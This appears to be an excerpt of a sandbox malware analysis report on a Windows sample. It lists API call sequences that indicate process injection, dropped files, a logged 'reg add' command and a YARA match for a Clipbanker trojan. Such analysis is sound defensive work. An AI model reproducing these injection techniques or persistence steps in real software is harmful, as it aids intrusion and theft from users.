Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004026D2 NtOpenKey, 0_2_004026D2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402745 NtEnumerateKey, 0_2_00402745
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402348 NtQuerySystemInformation,NtQuerySystemInformation, 0_2_00402348
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040156B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402770 NtEnumerateKey, 0_2_00402770
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040217B NtQuerySystemInformation,NtQuerySystemInformation, 0_2_0040217B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040217D NtQuerySystemInformation,NtQuerySystemInformation, 0_2_0040217D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004021CB NtQuerySystemInformation,NtQuerySystemInformation, 0_2_004021CB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004017DF NtMapViewOfSection,NtMapViewOfSection, 0_2_004017DF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004015E0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004015E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004015F1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004015F1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004015F5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004015F5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004015F8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004015F8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402188 NtQuerySystemInformation,NtQuerySystemInformation, 0_2_00402188
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004027A0 NtClose, 0_2_004027A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004021A1 NtQuerySystemInformation,NtQuerySystemInformation, 0_2_004021A1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004021BB NtQuerySystemInformation,NtQuerySystemInformation, 0_2_004021BB
Source: C:\Users\user\AppData\Roaming\rujtcgu Code function: 4_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_004015D5
Source: C:\Users\user\AppData\Roaming\rujtcgu Code function: 4_2_00401603 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_00401603
Source: C:\Users\user\AppData\Roaming\rujtcgu Code function: 4_2_0040161A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_0040161A
Source: C:\Users\user\AppData\Roaming\rujtcgu Code function: 4_2_004026D2 NtOpenKey, 4_2_004026D2
Source: C:\Users\user\AppData\Roaming\rujtcgu Code function: 4_2_00402745 NtEnumerateKey, 4_2_00402745
Source: C:\Users\user\AppData\Roaming\rujtcgu Code function: 4_2_00402348 NtQuerySystemInformation,NtQuerySystemInformation, 4_2_00402348
Source: C:\Users\user\AppData\Roaming\rujtcgu Code function: 4_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_0040156B
Source: C:\Users\user\AppData\Roaming\rujtcgu Code function: 4_2_00402770 NtEnumerateKey, 4_2_00402770
Source: C:\Users\user\AppData\Roaming\rujtcgu Code function: 4_2_0040217B NtQuerySystemInformation,NtQuerySystemInformation, 4_2_0040217B
Source: C:\Users\user\AppData\Roaming\rujtcgu Code function: 4_2_0040217D NtQuerySystemInformation,NtQuerySystemInformation, 4_2_0040217D
Source: C:\Users\user\AppData\Roaming\rujtcgu Code function: 4_2_004021CB NtQuerySystemInformation,NtQuerySystemInformation, 4_2_004021CB
Source: C:\Users\user\AppData\Roaming\rujtcgu Code function: 4_2_004017DF NtMapViewOfSection,NtMapViewOfSection, 4_2_004017DF
Source: C:\Users\user\AppData\Roaming\rujtcgu Code function: 4_2_004015E0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_004015E0
Source: C:\Users\user\AppData\Roaming\rujtcgu Code function: 4_2_004015F1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_004015F1
Source: C:\Users\user\AppData\Roaming\rujtcgu Code function: 4_2_004015F5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_004015F5
Source: C:\Users\user\AppData\Roaming\rujtcgu Code function: 4_2_004015F8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_004015F8
Source: C:\Users\user\AppData\Roaming\rujtcgu Code function: 4_2_00402188 NtQuerySystemInformation,NtQuerySystemInformation, 4_2_00402188
Source: C:\Users\user\AppData\Roaming\rujtcgu Code function: 4_2_004027A0 NtClose, 4_2_004027A0
Source: C:\Users\user\AppData\Roaming\rujtcgu Code function: 4_2_004021A1 NtQuerySystemInformation,NtQuerySystemInformation, 4_2_004021A1
Source: C:\Users\user\AppData\Roaming\rujtcgu Code function: 4_2_004021BB NtQuerySystemInformation,NtQuerySystemInformation, 4_2_004021BB
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A10110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess, 9_2_04A10110
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A70110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess, 14_2_04A70110
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A13520 9_2_04A13520
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A17520 9_2_04A17520
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A1A699 9_2_04A1A699
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A5B69F 9_2_04A5B69F
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A1E6E0 9_2_04A1E6E0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A1A79A 9_2_04A1A79A
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A3D7F1 9_2_04A3D7F1
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A1C760 9_2_04A1C760
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A1B0B0 9_2_04A1B0B0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A170E0 9_2_04A170E0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A130F0 9_2_04A130F0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A200D0 9_2_04A200D0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A1A026 9_2_04A1A026
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A2F030 9_2_04A2F030
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A1B000 9_2_04A1B000
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A3D1A4 9_2_04A3D1A4
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A19120 9_2_04A19120
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A5E141 9_2_04A5E141
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A922C0 9_2_04A922C0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A17220 9_2_04A17220
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A17393 9_2_04A17393
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A5E37C 9_2_04A5E37C
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A15DE7 9_2_04A15DE7
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A15DF7 9_2_04A15DF7
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A52D1E 9_2_04A52D1E
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A44E9F 9_2_04A44E9F
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A18E60 9_2_04A18E60
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A17880 9_2_04A17880
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A318D0 9_2_04A318D0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A3E9A3 9_2_04A3E9A3
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A3F9B0 9_2_04A3F9B0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A159F7 9_2_04A159F7
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A189D0 9_2_04A189D0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A1A916 9_2_04A1A916
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A17A80 9_2_04A17A80
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A1CA10 9_2_04A1CA10
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A1DBE0 9_2_04A1DBE0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A20B00 9_2_04A20B00
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A12B60 9_2_04A12B60
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_0040D240 10_2_0040D240
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00419F90 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00405057 10_2_00405057
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_0040C070 10_2_0040C070
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_0042E003 10_2_0042E003
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_0042F010 10_2_0042F010
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00408030 10_2_00408030
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_004070E0 10_2_004070E0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00410160 10_2_00410160
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_004C8113 10_2_004C8113
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_004021C0 10_2_004021C0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_004C9343 10_2_004C9343
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_0044237E 10_2_0044237E
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00405447 10_2_00405447
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00405457 10_2_00405457
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_004084C0 10_2_004084C0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_004344FF 10_2_004344FF
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00449506 10_2_00449506
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_0043E5A3 10_2_0043E5A3
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_0044B5B1 10_2_0044B5B1
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_0040A660 10_2_0040A660
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00409686 10_2_00409686
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_0041E690 10_2_0041E690
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00406740 10_2_00406740
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00402750 10_2_00402750
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_0040A710 10_2_0040A710
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_0040F730 10_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00408780 10_2_00408780
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_0044D7A1 10_2_0044D7A1
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_0042C804 10_2_0042C804
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00406880 10_2_00406880
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00481920 10_2_00481920
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_0044D9DC 10_2_0044D9DC
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_004069F3 10_2_004069F3
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00449A71 10_2_00449A71
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00443B40 10_2_00443B40
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00402B80 10_2_00402B80
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00406B80 10_2_00406B80
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00409CF9 10_2_00409CF9
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_0044ACFF 10_2_0044ACFF
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_0040DD40 10_2_0040DD40
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00427D6C 10_2_00427D6C
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_0040BDC0 10_2_0040BDC0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00409DFA 10_2_00409DFA
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_0042CE51 10_2_0042CE51
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00406EE0 10_2_00406EE0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00409F76 10_2_00409F76
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00420F30 10_2_00420F30
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00449FE3 10_2_00449FE3
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A73520 14_2_04A73520
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A77520 14_2_04A77520
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04ABB69F 14_2_04ABB69F
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A7A699 14_2_04A7A699
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A7E6E0 14_2_04A7E6E0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A7A79A 14_2_04A7A79A
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A9D7F1 14_2_04A9D7F1
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A7C760 14_2_04A7C760
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A7B0B0 14_2_04A7B0B0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A770E0 14_2_04A770E0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A730F0 14_2_04A730F0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A800D0 14_2_04A800D0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A7A026 14_2_04A7A026
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A8F030 14_2_04A8F030
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A7B000 14_2_04A7B000
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A9D1A4 14_2_04A9D1A4
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A79120 14_2_04A79120
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04ABE141 14_2_04ABE141
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04AF22C0 14_2_04AF22C0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A77220 14_2_04A77220
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A77393 14_2_04A77393
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04ABE37C 14_2_04ABE37C
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A75DE7 14_2_04A75DE7
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A75DF7 14_2_04A75DF7
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04AB2D1E 14_2_04AB2D1E
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04AA4E9F 14_2_04AA4E9F
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A78E60 14_2_04A78E60
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A77880 14_2_04A77880
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A918D0 14_2_04A918D0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A9E9A3 14_2_04A9E9A3
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A9F9B0 14_2_04A9F9B0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A759F7 14_2_04A759F7
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A789D0 14_2_04A789D0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A7A916 14_2_04A7A916
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A77A80 14_2_04A77A80
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A7CA10 14_2_04A7CA10
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A7DBE0 14_2_04A7DBE0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A80B00 14_2_04A80B00
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A72B60 14_2_04A72B60
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0042E003 15_2_0042E003
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0040D240 15_2_0040D240
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0041E690 15_2_0041E690
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0040F730 15_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_00481920 15_2_00481920
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_00419F90 15_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0050D050 15_2_0050D050
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_00405057 15_2_00405057
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0040C070 15_2_0040C070
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0042F010 15_2_0042F010
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0050D008 15_2_0050D008
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_00408030 15_2_00408030
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0050D028 15_2_0050D028
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_004070E0 15_2_004070E0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0050D090 15_2_0050D090
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0050D0A8 15_2_0050D0A8
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_00410160 15_2_00410160
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_004C8113 15_2_004C8113
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_004021C0 15_2_004021C0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_004C9343 15_2_004C9343
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0044237E 15_2_0044237E
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_00405447 15_2_00405447
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_00405457 15_2_00405457
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_004084C0 15_2_004084C0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0050C4E0 15_2_0050C4E0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_004344FF 15_2_004344FF
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_00449506 15_2_00449506
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0043E5A3 15_2_0043E5A3
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0044B5B1 15_2_0044B5B1
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0040A660 15_2_0040A660
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_00409686 15_2_00409686
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_00406740 15_2_00406740
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_00402750 15_2_00402750
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0040A710 15_2_0040A710
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_00408780 15_2_00408780
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0044D7A1 15_2_0044D7A1
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0042C804 15_2_0042C804
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_00406880 15_2_00406880
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0050C960 15_2_0050C960
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0050C928 15_2_0050C928
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0044D9DC 15_2_0044D9DC
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_004069F3 15_2_004069F3
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0050C988 15_2_0050C988
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0050C9A8 15_2_0050C9A8
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_00449A71 15_2_00449A71
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_004E1AB0 15_2_004E1AB0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_00443B40 15_2_00443B40
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0050CB78 15_2_0050CB78
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_00402B80 15_2_00402B80
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_00406B80 15_2_00406B80
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_00409CF9 15_2_00409CF9
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0044ACFF 15_2_0044ACFF
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0040DD40 15_2_0040DD40
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0050CD60 15_2_0050CD60
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0040BDC0 15_2_0040BDC0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0050CDF0 15_2_0050CDF0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_00409DFA 15_2_00409DFA
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0050CE58 15_2_0050CE58
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0042CE51 15_2_0042CE51
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_00406EE0 15_2_00406EE0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_00409F76 15_2_00409F76
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_00420F30 15_2_00420F30
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0050CF28 15_2_0050CF28
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0050CFC0 15_2_0050CFC0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_00449FE3 15_2_00449FE3
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0050CF90 15_2_0050CF90
Source: Joe Sandbox View Dropped File: C:\ProgramData\EGIJEBGDAFHI\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\EGIJEBGDAFHI\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: String function: 04AA0160 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: String function: 04A98EC0 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: String function: 00428C81 appears 66 times
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: String function: 00420EC2 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: String function: 04A40160 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: String function: 04A38EC0 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: String function: 004547A0 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: String function: 00422587 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: String function: 0042F7C0 appears 129 times
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: String function: 0044F23E appears 108 times
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: String function: 00428520 appears 125 times
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: String function: 00450870 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: String function: 00454E50 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: String function: 00441A25 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: String function: 0044F26C appears 41 times
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2580 -s 10876
Source: file.exe, 00000000.00000002.1709704213.0000000002C8C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamesFilezera2 vs file.exe
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: 32.2.mstsca.exe.8a15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
